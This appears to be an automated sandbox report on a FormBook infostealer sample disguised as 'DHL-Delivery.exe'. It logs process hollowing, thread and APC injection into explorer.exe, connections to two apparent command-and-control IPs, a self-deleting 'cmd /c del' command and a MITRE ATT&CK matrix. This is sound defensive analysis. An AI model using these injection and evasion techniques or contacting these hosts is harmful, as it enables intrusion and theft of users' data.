    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16BA0D mov eax, dword ptr fs:[00000030h]6_2_1E16BA0D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199A3B mov eax, dword ptr fs:[00000030h]6_2_1E199A3B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E106A38 mov eax, dword ptr fs:[00000030h]6_2_1E106A38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F1A30 mov eax, dword ptr fs:[00000030h]6_2_1E0F1A30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F1A30 mov eax, dword ptr fs:[00000030h]6_2_1E0F1A30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F1A30 mov eax, dword ptr fs:[00000030h]6_2_1E0F1A30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F1A30 mov eax, dword ptr fs:[00000030h]6_2_1E0F1A30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F1A30 mov ecx, dword ptr fs:[00000030h]6_2_1E0F1A30
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173A50 mov eax, dword ptr fs:[00000030h]6_2_1E173A50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E173A50 mov eax, dword ptr fs:[00000030h]6_2_1E173A50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BA5C mov eax, dword ptr fs:[00000030h]6_2_1E15BA5C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BA5C mov eax, dword ptr fs:[00000030h]6_2_1E15BA5C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BA5C mov eax, dword ptr fs:[00000030h]6_2_1E15BA5C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15BA5C mov eax, dword ptr fs:[00000030h]6_2_1E15BA5C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1A4A mov eax, dword ptr fs:[00000030h]6_2_1E1B1A4A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E110A4C mov eax, dword ptr fs:[00000030h]6_2_1E110A4C
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15DA4A mov eax, dword ptr fs:[00000030h]6_2_1E15DA4A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15DA4A mov eax, dword ptr fs:[00000030h]6_2_1E15DA4A
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119A70 mov eax, dword ptr fs:[00000030h]6_2_1E119A70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119A70 mov eax, dword ptr fs:[00000030h]6_2_1E119A70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119A70 mov ecx, dword ptr fs:[00000030h]6_2_1E119A70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E119A70 mov eax, dword ptr fs:[00000030h]6_2_1E119A70
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAA76 mov eax, dword ptr fs:[00000030h]6_2_1E0DAA76
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DAA76 mov eax, dword ptr fs:[00000030h]6_2_1E0DAA76
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DBA82 mov ecx, dword ptr fs:[00000030h]6_2_1E0DBA82
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E1A9D mov eax, dword ptr fs:[00000030h]6_2_1E0E1A9D
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DDAAA mov eax, dword ptr fs:[00000030h]6_2_1E0DDAAA
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FEABF mov eax, dword ptr fs:[00000030h]6_2_1E0FEABF
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19BAAD mov eax, dword ptr fs:[00000030h]6_2_1E19BAAD
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16BAA0 mov eax, dword ptr fs:[00000030h]6_2_1E16BAA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16BAA0 mov eax, dword ptr fs:[00000030h]6_2_1E16BAA0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E175AD0 mov eax, dword ptr fs:[00000030h]6_2_1E175AD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6AC5 mov eax, dword ptr fs:[00000030h]6_2_1E0E6AC5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6AC5 mov eax, dword ptr fs:[00000030h]6_2_1E0E6AC5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6AC5 mov eax, dword ptr fs:[00000030h]6_2_1E0E6AC5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E6AC5 mov eax, dword ptr fs:[00000030h]6_2_1E0E6AC5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17EAC6 mov eax, dword ptr fs:[00000030h]6_2_1E17EAC6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17EAC6 mov eax, dword ptr fs:[00000030h]6_2_1E17EAC6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17EAC6 mov eax, dword ptr fs:[00000030h]6_2_1E17EAC6
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199AC2 mov eax, dword ptr fs:[00000030h]6_2_1E199AC2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0DBAD0 mov eax, dword ptr fs:[00000030h]6_2_1E0DBAD0
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1B1AC5 mov eax, dword ptr fs:[00000030h]6_2_1E1B1AC5
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E113AF4 mov eax, dword ptr fs:[00000030h]6_2_1E113AF4
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7AEB mov eax, dword ptr fs:[00000030h]6_2_1E0D7AEB
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE2 mov eax, dword ptr fs:[00000030h]6_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE2 mov eax, dword ptr fs:[00000030h]6_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE2 mov eax, dword ptr fs:[00000030h]6_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE2 mov eax, dword ptr fs:[00000030h]6_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE2 mov eax, dword ptr fs:[00000030h]6_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E170AE2 mov eax, dword ptr fs:[00000030h]6_2_1E170AE2
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A2B18 mov eax, dword ptr fs:[00000030h]6_2_1E1A2B18
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E1A2B18 mov eax, dword ptr fs:[00000030h]6_2_1E1A2B18
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15DB1E mov eax, dword ptr fs:[00000030h]6_2_1E15DB1E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E2B00 mov eax, dword ptr fs:[00000030h]6_2_1E0E2B00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F6B00 mov eax, dword ptr fs:[00000030h]6_2_1E0F6B00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F6B00 mov eax, dword ptr fs:[00000030h]6_2_1E0F6B00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F6B00 mov eax, dword ptr fs:[00000030h]6_2_1E0F6B00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F6B00 mov eax, dword ptr fs:[00000030h]6_2_1E0F6B00
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19CB0F mov eax, dword ptr fs:[00000030h]6_2_1E19CB0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0D7B1B mov eax, dword ptr fs:[00000030h]6_2_1E0D7B1B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E166B0F mov eax, dword ptr fs:[00000030h]6_2_1E166B0F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FFB10 mov eax, dword ptr fs:[00000030h]6_2_1E0FFB10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0FFB10 mov eax, dword ptr fs:[00000030h]6_2_1E0FFB10
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E186B38 mov ecx, dword ptr fs:[00000030h]6_2_1E186B38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E186B38 mov eax, dword ptr fs:[00000030h]6_2_1E186B38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E186B38 mov eax, dword ptr fs:[00000030h]6_2_1E186B38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E186B38 mov eax, dword ptr fs:[00000030h]6_2_1E186B38
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19DB29 mov eax, dword ptr fs:[00000030h]6_2_1E19DB29
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19DB29 mov eax, dword ptr fs:[00000030h]6_2_1E19DB29
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19DB29 mov eax, dword ptr fs:[00000030h]6_2_1E19DB29
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E19DB29 mov eax, dword ptr fs:[00000030h]6_2_1E19DB29
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0F4B3B mov eax, dword ptr fs:[00000030h]6_2_1E0F4B3B
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E100B54 mov eax, dword ptr fs:[00000030h]6_2_1E100B54
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15AB50 mov eax, dword ptr fs:[00000030h]6_2_1E15AB50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E15AB50 mov ecx, dword ptr fs:[00000030h]6_2_1E15AB50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17DB50 mov eax, dword ptr fs:[00000030h]6_2_1E17DB50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E17DB50 mov eax, dword ptr fs:[00000030h]6_2_1E17DB50
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E2B5E mov ecx, dword ptr fs:[00000030h]6_2_1E0E2B5E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E2B5E mov eax, dword ptr fs:[00000030h]6_2_1E0E2B5E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E0E2B5E mov eax, dword ptr fs:[00000030h]6_2_1E0E2B5E
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E11DB43 mov eax, dword ptr fs:[00000030h]6_2_1E11DB43
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E199B4F mov eax, dword ptr fs:[00000030h]6_2_1E199B4F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CB4F mov eax, dword ptr fs:[00000030h]6_2_1E16CB4F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CB4F mov eax, dword ptr fs:[00000030h]6_2_1E16CB4F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 6_2_1E16CB4F mov eax, dword ptr fs:[00000030h]6_2_1E16CB4F
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 198.54.126.238 80Jump to behavior
    Maps a DLL or memory area into another processShow sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: unknown protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
    Modifies the context of a thread in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeThread register set: target process: 4472Jump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 4472Jump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 5372Jump to behavior
    Queues an APC in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
    Sample uses process hollowing techniqueShow sources
    Source: C:\Users\user\Desktop\DHL-Delivery.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1350000Jump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe' Jump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DHL-Delivery.exe'Jump to behavior
    Source: explorer.exe, 00000007.00000000.2085348141.0000000001991000.00000002.00000001.sdmpBinary or memory string: Program Managere
    Source: explorer.exe, 00000007.00000002.2730166567.0000000005E30000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000002.3599730539.00000000034F1000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3601733109.0000000000C81000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: Progman`XU
    Source: explorer.exe, 00000007.00000000.2085348141.0000000001991000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.3599730539.00000000034F1000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3601733109.0000000000C81000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000007.00000000.2085348141.0000000001991000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: cmmon32.exe, 0000000A.00000002.3599730539.00000000034F1000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3601733109.0000000000C81000.00000002.00000001.sdmpBinary or memory string: Program ManagerName
    Source: explorer.exe, 00000007.00000000.2083995735.00000000013DF000.00000004.00000020.sdmpBinary or memory string: Progman1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: 0_2_021A6475 cpuid 0_2_021A6475
    Source: C:\Windows\System32\WerFault.exeQueries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4.tmp.dmp VolumeInformationJump to behavior
    Source: C:\Windows\System32\WerFault.exeQueries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FC9.tmp.WERInternalMetadata.xml VolumeInformationJump to behavior
    Source: C:\Windows\System32\WerFault.exeQueries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2095.tmp.xml VolumeInformationJump to behavior
    Source: C:\Windows\System32\WerFault.exeQueries volume information: C:\ProgramData\Microsoft\Windows\WER\Temp VolumeInformationJump to behavior
    Source: C:\Windows\System32\WerFault.exeQueries volume information: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_70877588966c9e9114ebf3f0598991a0ff84_15123ce1_166a2352\Report.wer VolumeInformationJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132543128314520433.txt VolumeInformation
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\360\360safe\360Safe.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AVG\Av\avgui.exe
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: Autoruns.exe
    Source: SearchUI.exe, 00000019.00000003.2902596487.000001E6A0208000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Spybot - Search & Destroy\SpybotSD.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERAntiSpyware\SUPERAntiSpyware.exe
    Source: explorer.exe, 00000012.00000003.2837870121.00000000057B5000.00000004.00000001.sdmpBinary or memory string: \\192.168.0.2\all\procexp.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Malwarebytes Anti-Malware\mbam.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Unlocker\Unlocker.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Wireshark\Wireshark.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\AntiVir Desktop\avcenter.exe
    Source: SearchUI.exe, 00000019.00000003.2897031539.000001E6A02DB000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\Antivirus\avcenter.exe
    Source: SearchUI.exe, 00000019.00000003.2835514740.000001E6A02C5000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AVG\AVG2015\avgui.exe
    Source: explorer.exe, 00000012.00000003.2776973957.000000000469F000.00000004.00000001.sdmpBinary or memory string: 9c:\users\user\downloads\sysinternalssuite\autoruns.exe

    Stealing of Sensitive Information:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY
    Yara detected Generic DropperShow sources
    Source: Yara matchFile source: Process Memory Space: DHL-Delivery.exe PID: 892, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: cmmon32.exe PID: 6544, type: MEMORY
    Source: SearchUI.exe, 00000019.00000003.2903001728.000001E69FBDF000.00000004.00000001.sdmpBinary or memory string: 3373usingapp.TubeTubeforWin_89x4y45kz1d4g!App
    Source: SearchUI.exe, 00000019.00000003.2835703283.000001E69FF38000.00000004.00000001.sdmpBinary or memory string: 3373usingapp.TubeTubeforWin_89x4y45kz1d4g!App12444
    Source: SearchUI.exe, 00000019.00000003.2903001728.000001E69FBDF000.00000004.00000001.sdmpBinary or memory string: Microsoft.Tentacles_8wekyb3d8bbwe!AppAudialsAG.AudialsRadio_3eby6px24ctcy!App0EB8BD08.RuletheKingdom_erk4rrwmt7jyt!App1247042721BubbleKartel.Dubcrush_f7de3ptpzj46y!AppDellPrinter.DellDocumentHub_nmdn7k89bxsn6!App25170robotapps.SocialAppWorld_6gw3az90y6str!App3373usingapp.TubeTubeforWin_89x4y45kz1d4g!AppCapsuleDigital.PhotoFunia_yede6ekgzbztc!App

    Remote Access Functionality:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion23LSASS MemorySecurity Software Discovery731Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery321Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
